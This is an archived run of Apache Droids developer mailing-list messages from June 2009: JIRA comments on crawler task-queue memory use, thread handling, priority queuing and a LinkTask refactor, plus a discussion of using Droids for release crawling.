X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/DROIDS-52?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12721115#action_12721115 ] Thorsten Scherler commented on DROIDS-52: ----------------------------------------- Re your comment to use a long instead of date I am not sure, wouldn't be the sorting effected? Do you suggest the following for a long representation of the date: 2000/01/01 = 20000101 or yyyyMMdd? If so yeah, sound good. To the URI or String discussion I do not really understand the test case however I agree that we should try to standardize the usage. From your findings I would go with String. > Optimize memory usage of TaskQueue and History > ---------------------------------------------- > > Key: DROIDS-52 > URL: https://issues.apache.org/jira/browse/DROIDS-52 > Project: Droids > Issue Type: Wish > Components: core > Affects Versions: 0.01 > Reporter: Mingfai Ma > Priority: Minor > Attachments: TaskQueueMemoryTest.java > > > Tasks in TaskQueue and History are items that has to be "persisted" in a single crawl "session"/run. They are not consuming too much memory right now and this task is created for tracking some optimization ideas. > The following is some sample memory usage figures in a 32-bit Windows Vista environment: (refer to the attached test case) > - With javamex classmexer, 1M LinkTask in a queue consumes 280M of memory. > - For history, stores as MD5 as String, each URL could take 104 bytes only. 1M URL takes 100M roughly. (reference: http://www.javamex.com/tutorials/memory/string_memory_usage.shtml) Notice that MD5 is not guaranteed to be unique but it should be ok for general cases. > - To reduce memory footprint future, we may store MD5 as byte[], that take exactly 32 bytes, and will consumes 32M memory for 1M records > Previously, I ran a job that I try to reduce the memory usage for TaskQueue, I tried to simulate a Queue function with JBossCache that support eviction and passivation. JBossCache's passivation mechanism basically serialize the item into a database (or other device) and unload them from memory. It could effectively reduce memory usage. For a Queue with lots of items, there is no need to keep them all in memory as they won't be processed at the same time anyway. If it is necessary to keep a reference, we may passivate the LinkTask and just keep a hash (MD5, or even hashCode()). > There is one more way to store the tasks in an embedded database such as H2Database. It stores the data on disk. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Thu Jun 18 07:56:20 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 30409 invoked from network); 18 Jun 2009 07:56:20 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Jun 2009 07:56:20 -0000 Received: (qmail 70767 invoked by uid 500); 18 Jun 2009 07:56:31 -0000 Delivered-To: [email protected] Received: (qmail 70734 invoked by uid 500); 18 Jun 2009 07:56:31 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <droids-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 70724 invoked by uid 99); 18 Jun 2009 07:56:31 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Jun 2009 07:56:31 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Jun 2009 07:56:28 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 6D3F7234C053 for <[email protected]>; Thu, 18 Jun 2009 00:56:07 -0700 (PDT) Message-ID: <1936841165.1245311767446.JavaMail.jira@brutus> Date: Thu, 18 Jun 2009 00:56:07 -0700 (PDT) From: "Thorsten Scherler (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (DROIDS-51) review MultiThreadedTaskMaster thread creation/looping In-Reply-To: <1321792301.1242247845674.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/DROIDS-51?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12721117#action_12721117 ] Thorsten Scherler commented on DROIDS-51: ----------------------------------------- ATM I am not able to run the patch either however if you guys feel we should apply then please go ahead and apply it. the MultiThreadedTaskMaster is broken in any way in trunk. > review MultiThreadedTaskMaster thread creation/looping > ------------------------------------------------------ > > Key: DROIDS-51 > URL: https://issues.apache.org/jira/browse/DROIDS-51 > Project: Droids > Issue Type: Improvement > Components: core > Reporter: Ryan McKinley > Attachments: DROIDS-51-MultiThreadedTaskMaster.patch > > > Currently the MultiThreadedTaskMaster has a looping thread that then starts a new Thread for each task (and then that starts a new worker for each Task). > This patch reworks this model so that: > * one thread makes sure there is a thread (runner) for each slot in the pool > * the runner starts new workers for each task and keeps going while there are more tasks to handle -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Thu Jun 18 08:04:24 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 31859 invoked from network); 18 Jun 2009 08:04:24 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Jun 2009 08:04:24 -0000 Received: (qmail 73006 invoked by uid 500); 18 Jun 2009 08:04:35 -0000 Delivered-To: [email protected] Received: (qmail 72958 invoked by uid 500); 18 Jun 2009 08:04:35 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <droids-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 72948 invoked by uid 99); 18 Jun 2009 08:04:35 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Jun 2009 08:04:35 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Jun 2009 08:04:27 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 5A71C234C044 for <[email protected]>; Thu, 18 Jun 2009 01:04:07 -0700 (PDT) Message-ID: <1898123751.1245312247355.JavaMail.jira@brutus> Date: Thu, 18 Jun 2009 01:04:07 -0700 (PDT) From: "Thorsten Scherler (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (DROIDS-48) Support prioritizing in the TaskQueue In-Reply-To: <31962839.1240139927532.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/DROIDS-48?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12721118#action_12721118 ] Thorsten Scherler commented on DROIDS-48: ----------------------------------------- I am fine with the feature but I have problems with the diff. It adds formating changes to the code which makes it hard to identify the real changes. > Support prioritizing in the TaskQueue > ------------------------------------- > > Key: DROIDS-48 > URL: https://issues.apache.org/jira/browse/DROIDS-48 > Project: Droids > Issue Type: New Feature > Components: core > Affects Versions: 0.01 > Reporter: Mingfai Ma > Attachments: DROIDS-48d.patch, DROIDS-48d2.patch > > > Use case: > - when looping a directory, (imagine someone is too stupid and dunno the dmoz database can be downloaded and try to crawl it with Droids) we got collect a lot of links that will be handled later. assume the requirement is to fetch dmoz directory +1 link outside dmoz.org, In the original mechanism, it will keep adding new links to the TaskQueue. Ideally, there should be a mechanism to give a higher priority to the non-dmoz.org links, so when non-dmoz links are added, they are processed first, and be removed from the TaskQueue asap. > with the patch in DROIDS-47, a constructor is added to the SimpleTaskQueue to support a custom Queue. This issue suggests to change the SimpleTaskQueue to use a PriorityBlockingQueue by default, and add a getWeight to the Task interface > I'm also thinking about a more complex TaskQueue. to be discussed in the mail list later. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Thu Jun 18 08:08:27 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 32776 invoked from network); 18 Jun 2009 08:08:27 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Jun 2009 08:08:27 -0000 Received: (qmail 77921 invoked by uid 500); 18 Jun 2009 08:08:38 -0000 Delivered-To: [email protected] Received: (qmail 77876 invoked by uid 500); 18 Jun 2009 08:08:38 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <droids-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 77866 invoked by uid 99); 18 Jun 2009 08:08:38 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Jun 2009 08:08:38 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Jun 2009 08:08:29 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 84003234C044 for <[email protected]>; Thu, 18 Jun 2009 01:08:07 -0700 (PDT) Message-ID: <445315503.1245312487539.JavaMail.jira@brutus> Date: Thu, 18 Jun 2009 01:08:07 -0700 (PDT) From: "Mingfai Ma (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (DROIDS-52) Optimize memory usage of TaskQueue and History In-Reply-To: <295189861.1242727307037.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/DROIDS-52?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12721119#action_12721119 ] Mingfai Ma commented on DROIDS-52: ---------------------------------- for the previous comment, I'm more focus on reducing memory usage. for Long instead of Date, i mean we store the new Date().getTime() instead of the date. And from my test, it uses less memory. Sorting will not be affected. I think there is no impact unless our date usage involves timezone. re. URI, i have found another issue. - there are possibly invalid/non-standard URI on the Internet which are usable by modern browsers. the following are two examples: http://domainremoved.com/adserv|3.0|327|2062389|0|225|ADTECH;loc=300;grp=[group] http://domainremoved.com/index.php?command=product:product->details&productId=1889640 they contains illegal character according to java.net.URI, but if we put the link in Firefox, it does work. - as you may know, Heritrix doesn't use URI but use UURI (usable URI). - we probably should give up java.net.URI, i'm going to create another issue for this later. > Optimize memory usage of TaskQueue and History > ---------------------------------------------- > > Key: DROIDS-52 > URL: https://issues.apache.org/jira/browse/DROIDS-52 > Project: Droids > Issue Type: Wish > Components: core > Affects Versions: 0.01 > Reporter: Mingfai Ma > Priority: Minor > Attachments: TaskQueueMemoryTest.java > > > Tasks in TaskQueue and History are items that has to be "persisted" in a single crawl "session"/run. They are not consuming too much memory right now and this task is created for tracking some optimization ideas. > The following is some sample memory usage figures in a 32-bit Windows Vista environment: (refer to the attached test case) > - With javamex classmexer, 1M LinkTask in a queue consumes 280M of memory. > - For history, stores as MD5 as String, each URL could take 104 bytes only. 1M URL takes 100M roughly. (reference: http://www.javamex.com/tutorials/memory/string_memory_usage.shtml) Notice that MD5 is not guaranteed to be unique but it should be ok for general cases. > - To reduce memory footprint future, we may store MD5 as byte[], that take exactly 32 bytes, and will consumes 32M memory for 1M records > Previously, I ran a job that I try to reduce the memory usage for TaskQueue, I tried to simulate a Queue function with JBossCache that support eviction and passivation. JBossCache's passivation mechanism basically serialize the item into a database (or other device) and unload them from memory. It could effectively reduce memory usage. For a Queue with lots of items, there is no need to keep them all in memory as they won't be processed at the same time anyway. If it is necessary to keep a reference, we may passivate the LinkTask and just keep a hash (MD5, or even hashCode()). > There is one more way to store the tasks in an embedded database such as H2Database. It stores the data on disk. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Thu Jun 18 08:26:25 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 35990 invoked from network); 18 Jun 2009 08:26:25 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Jun 2009 08:26:25 -0000 Received: (qmail 92946 invoked by uid 500); 18 Jun 2009 08:26:36 -0000 Delivered-To: [email protected] Received: (qmail 92899 invoked by uid 500); 18 Jun 2009 08:26:36 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <droids-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 92889 invoked by uid 99); 18 Jun 2009 08:26:36 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Jun 2009 08:26:36 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Jun 2009 08:26:28 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 3C300234C044 for <[email protected]>; Thu, 18 Jun 2009 01:26:08 -0700 (PDT) Message-ID: <164224649.1245313568231.JavaMail.jira@brutus> Date: Thu, 18 Jun 2009 01:26:08 -0700 (PDT) From: "Mingfai Ma (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (DROIDS-48) Support prioritizing in the TaskQueue In-Reply-To: <31962839.1240139927532.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/DROIDS-48?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12721121#action_12721121 ] Mingfai Ma commented on DROIDS-48: ---------------------------------- let me submit another patch. i have a habit to use the formatter of my IDE but I haven't set it to use the coding style of this project, so. ... :-P p.s. for this issue, it could be handled just by adding a weight integer field. but i feel it is most flexible if the LinkTask could whole any arbitrary data. And the simplest way is to make it extends Map. {code} public class LinkTask extends HashMap<String, Serializable> { //other interface are skipped; protected final String id; //whatever data type for ID protected final URI uri; //refer to DROIDS-52, this may cause problem for URI) // all the other data are optional {code} use cases: - say, in submitting a link, we want to associate information about cookie/http header, so the fetcher could use the cookie info when fetching - any optional fields like weight could be used - any component, such as filter or parser or whatever, could mark arbitrary tag for a link. say, a parser/factory, may read a "parser"/"contentType" value to decide how the data could be parsed. (so the parser doesn't depends on HttpEntity in interface) or the outlink could be attached directly to a LinkTask. i throw the initial idea here to see if anyone has comment. more details on the implementation could be provided. > Support prioritizing in the TaskQueue > ------------------------------------- > > Key: DROIDS-48 > URL: https://issues.apache.org/jira/browse/DROIDS-48 > Project: Droids > Issue Type: New Feature > Components: core > Affects Versions: 0.01 > Reporter: Mingfai Ma > Attachments: DROIDS-48d.patch, DROIDS-48d2.patch > > > Use case: > - when looping a directory, (imagine someone is too stupid and dunno the dmoz database can be downloaded and try to crawl it with Droids) we got collect a lot of links that will be handled later. assume the requirement is to fetch dmoz directory +1 link outside dmoz.org, In the original mechanism, it will keep adding new links to the TaskQueue. Ideally, there should be a mechanism to give a higher priority to the non-dmoz.org links, so when non-dmoz links are added, they are processed first, and be removed from the TaskQueue asap. > with the patch in DROIDS-47, a constructor is added to the SimpleTaskQueue to support a custom Queue. This issue suggests to change the SimpleTaskQueue to use a PriorityBlockingQueue by default, and add a getWeight to the Task interface > I'm also thinking about a more complex TaskQueue. to be discussed in the mail list later. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Thu Jun 18 09:08:28 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 51807 invoked from network); 18 Jun 2009 09:08:28 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Jun 2009 09:08:28 -0000 Received: (qmail 54369 invoked by uid 500); 18 Jun 2009 09:08:39 -0000 Delivered-To: [email protected] Received: (qmail 54324 invoked by uid 500); 18 Jun 2009 09:08:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <droids-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 54310 invoked by uid 99); 18 Jun 2009 09:08:39 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Jun 2009 09:08:39 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Jun 2009 09:08:28 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 5063C234C045 for <[email protected]>; Thu, 18 Jun 2009 02:08:07 -0700 (PDT) Message-ID: <347944494.1245316087314.JavaMail.jira@brutus> Date: Thu, 18 Jun 2009 02:08:07 -0700 (PDT) From: "Thorsten Scherler (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (DROIDS-52) Optimize memory usage of TaskQueue and History In-Reply-To: <295189861.1242727307037.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/DROIDS-52?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12721132#action_12721132 ] Thorsten Scherler commented on DROIDS-52: ----------------------------------------- Actually the links above are translated from the browser before sending the request. http://www.blooberry.com/indexdot/html/topics/urlencoding.htm explains it quite nicely. I normally use http://java.sun.com/j2se/1.5.0/docs/api/java/net/URLEncoder.html for that. Using the get time sounds good. > Optimize memory usage of TaskQueue and History > ---------------------------------------------- > > Key: DROIDS-52 > URL: https://issues.apache.org/jira/browse/DROIDS-52 > Project: Droids > Issue Type: Wish > Components: core > Affects Versions: 0.01 > Reporter: Mingfai Ma > Priority: Minor > Attachments: TaskQueueMemoryTest.java > > > Tasks in TaskQueue and History are items that has to be "persisted" in a single crawl "session"/run. They are not consuming too much memory right now and this task is created for tracking some optimization ideas. > The following is some sample memory usage figures in a 32-bit Windows Vista environment: (refer to the attached test case) > - With javamex classmexer, 1M LinkTask in a queue consumes 280M of memory. > - For history, stores as MD5 as String, each URL could take 104 bytes only. 1M URL takes 100M roughly. (reference: http://www.javamex.com/tutorials/memory/string_memory_usage.shtml) Notice that MD5 is not guaranteed to be unique but it should be ok for general cases. > - To reduce memory footprint future, we may store MD5 as byte[], that take exactly 32 bytes, and will consumes 32M memory for 1M records > Previously, I ran a job that I try to reduce the memory usage for TaskQueue, I tried to simulate a Queue function with JBossCache that support eviction and passivation. JBossCache's passivation mechanism basically serialize the item into a database (or other device) and unload them from memory. It could effectively reduce memory usage. For a Queue with lots of items, there is no need to keep them all in memory as they won't be processed at the same time anyway. If it is necessary to keep a reference, we may passivate the LinkTask and just keep a hash (MD5, or even hashCode()). > There is one more way to store the tasks in an embedded database such as H2Database. It stores the data on disk. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Thu Jun 18 09:12:24 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 52605 invoked from network); 18 Jun 2009 09:12:24 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Jun 2009 09:12:24 -0000 Received: (qmail 60299 invoked by uid 500); 18 Jun 2009 09:12:35 -0000 Delivered-To: [email protected] Received: (qmail 60256 invoked by uid 500); 18 Jun 2009 09:12:35 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <droids-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 60246 invoked by uid 99); 18 Jun 2009 09:12:35 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Jun 2009 09:12:35 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Jun 2009 09:12:27 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 522EB234C045 for <[email protected]>; Thu, 18 Jun 2009 02:12:07 -0700 (PDT) Message-ID: <1789064275.1245316327332.JavaMail.jira@brutus> Date: Thu, 18 Jun 2009 02:12:07 -0700 (PDT) From: "Thorsten Scherler (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (DROIDS-48) Support prioritizing in the TaskQueue In-Reply-To: <31962839.1240139927532.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/DROIDS-48?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12721133#action_12721133 ] Thorsten Scherler commented on DROIDS-48: ----------------------------------------- Hmm, yeah sounds more flexible for the future and I see the point to store related infos. I like it. > Support prioritizing in the TaskQueue > ------------------------------------- > > Key: DROIDS-48 > URL: https://issues.apache.org/jira/browse/DROIDS-48 > Project: Droids > Issue Type: New Feature > Components: core > Affects Versions: 0.01 > Reporter: Mingfai Ma > Attachments: DROIDS-48d.patch, DROIDS-48d2.patch > > > Use case: > - when looping a directory, (imagine someone is too stupid and dunno the dmoz database can be downloaded and try to crawl it with Droids) we got collect a lot of links that will be handled later. assume the requirement is to fetch dmoz directory +1 link outside dmoz.org, In the original mechanism, it will keep adding new links to the TaskQueue. Ideally, there should be a mechanism to give a higher priority to the non-dmoz.org links, so when non-dmoz links are added, they are processed first, and be removed from the TaskQueue asap. > with the patch in DROIDS-47, a constructor is added to the SimpleTaskQueue to support a custom Queue. This issue suggests to change the SimpleTaskQueue to use a PriorityBlockingQueue by default, and add a getWeight to the Task interface > I'm also thinking about a more complex TaskQueue. to be discussed in the mail list later. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Thu Jun 18 10:24:54 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 4887 invoked from network); 18 Jun 2009 10:24:54 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Jun 2009 10:24:54 -0000 Received: (qmail 70915 invoked by uid 500); 18 Jun 2009 10:25:05 -0000 Delivered-To: [email protected] Received: (qmail 70867 invoked by uid 500); 18 Jun 2009 10:25:05 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <droids-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 70855 invoked by uid 99); 18 Jun 2009 10:25:05 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Jun 2009 10:25:05 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mta.juntadeandalucia.es) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Jun 2009 10:24:56 +0000 Received: from [161.129.204.104] (helo=mail.juntadeandalucia.es) by guadix2.juntadeandalucia.es with esmtps (TLSv1:AES256-SHA:256) (Exim 4.69) (envelope-from <[email protected]>) id 1MHEnL-0007kE-V3; Thu, 18 Jun 2009 12:24:36 +0200 Received: from [161.129.204.104] by mail.juntadeandalucia.es with esmtpa (Exim 4.69) (envelope-from <[email protected]>) id 1MHEnL-0001D9-SW; Thu, 18 Jun 2009 12:24:35 +0200 Subject: Re: Crawler From: Thorsten Scherler <[email protected]> To: [email protected] Cc: [email protected] In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> Content-Type: text/plain; charset=utf-8 Date: Thu, 18 Jun 2009 12:32:47 +0200 Message-Id: <1245321167.6354.12.camel@panic> Mime-Version: 1.0 X-Mailer: Evolution 161.129.204.104 Content-Transfer-Encoding: quoted-printable X-Spam-Score: -99 X-Spam-Score-Int: -99 X-Virus-Checked: Checked by ClamAV on apache.org On Wed, 2009-06-17 at 13:14 +0100, Ross Gardler wrote: > [cc'd to droids list for info since I'm a mentor there too] >=20 > 2009/6/17 Robert Burrell Donkin <[email protected]>: > > Ross Gardler wrote: > >> 2009/6/17 Robert Burrell Donkin <[email protected]>= : > >>> i made a start on a crawler module yesterday to make it easier to > >>> download all releases from an URL. > >> > >> Why not use Droids? > >> > >> http://incubator.apache.org/droids/ > > > > in terms of downloading tech... > > > > i did consider looking into droids but couldn't find a release and it > > required jdk 1.6 so concluded that it's not an immediate option (i > > needed something right away) >=20 > Fair enough, maybe the Droids people will be prompted into makind a > release (JDK1.5 preferably) We are planing a release soonish I once wrote some 1.4 downward compilation with ant and retrotranslator (see http://svn.apache.org/viewvc/incubator/droids/trunk/build.xml?view=3Dco). However meanwhile we switched to maven and I have not looked into the integration of retrotranslator in maven. >=20 > > in the medium term, i think moving to droids sounds like the right move > > > > in terms of process, i see crawler as a replacement for the recursive > > rat script: download a release tree, check sums and signatures, unpack > > releases then run rat on each so it's more than just droids. >=20 > Sure it is, but an important part of that is the crawler and I don't > think we shuold be duplicating effort across two projects. >=20 > Maybe this mail will encourage the droids team to create a release > that we can use as the crawler. Sure there are only few issues to attend for our first release. salu2 --=20 Thorsten Scherler <thorsten.at.apache.org> Open Source Java <consulting, training and solutions> Sociedad Andaluza para el Desarrollo de la Sociedad=20 de la Informaci=C3=B3n, S.A.U. (SADESI) From [email protected] Thu Jun 18 10:29:21 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 9671 invoked from network); 18 Jun 2009 10:29:21 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Jun 2009 10:29:21 -0000 Received: (qmail 77801 invoked by uid 500); 18 Jun 2009 10:29:32 -0000 Delivered-To: [email protected] Received: (qmail 77759 invoked by uid 500); 18 Jun 2009 10:29:32 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <droids-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 77749 invoked by uid 99); 18 Jun 2009 10:29:32 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Jun 2009 10:29:32 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Jun 2009 10:29:29 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id E3F5F234C1E9 for <[email protected]>; Thu, 18 Jun 2009 03:29:07 -0700 (PDT) Message-ID: <322507187.1245320947932.JavaMail.jira@brutus> Date: Thu, 18 Jun 2009 03:29:07 -0700 (PDT) From: "Mingfai Ma (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (DROIDS-54) Make LinkTask supports arbitrary data by extends HashMap, and consider to refactor Task, Link, and LinkTask MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org Make LinkTask supports arbitrary data by extends HashMap, and consider to refactor Task, Link, and LinkTask ----------------------------------------------------------------------------------------------------------- Key: DROIDS-54 URL: https://issues.apache.org/jira/browse/DROIDS-54 Project: Droids Issue Type: New Feature Components: core Affects Versions: 0.01 Reporter: Mingfai Ma refer to the initial idea at: https://issues.apache.org/jira/browse/DROIDS-48?focusedCommentId=12721121&page=com.atlassian.jira.plugin.system.issuetabpanels%3Acomment-tabpanel#action_12721121 The current implementation of LinkTask {code} public class LinkTask implements Link, Serializable { private Date started; private final int depth; private final URI uri; private final Link from; private Date lastModifedDate; private Collection<URI> linksTo; 